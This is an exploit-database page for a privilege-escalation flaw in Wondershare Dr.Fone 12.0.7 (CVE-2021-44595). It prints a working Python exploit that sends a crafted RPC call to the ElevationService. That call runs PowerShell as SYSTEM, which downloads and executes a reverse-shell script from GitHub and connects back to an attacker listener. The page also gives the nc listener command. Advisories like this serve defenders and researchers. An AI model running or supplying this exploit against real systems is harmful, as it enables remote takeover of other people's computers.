Wondershare Dr.Fone 12.0.7 Privilege Escalation (ElevationService)

2022.05.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) # Date: 4/27/2022 # Exploit Author: Netanel Cohen & Tomer Peled # Vendor Homepage: https://drfone.wondershare.net/ # Software Link: https://download.wondershare.net/drfone_full4008.exe # Version: up to 12.0.7 # Tested on: Windows 10 # CVE : 2021-44595 # References: https://github.com/netanelc305/WonderShell #Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and #execute arbitrary code without any validation with SYSTEM privileges. #!/bin/python3 import msgpackrpc LADDR = "192.168.14.129" LPORT = 1338 RADDR = "192.168.14.137" RPORT = 12345 param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}" client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345)) result = client.call('system_s','powershell',param) # stty raw -echo; (stty size; cat) | nc -lvnp 1338


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top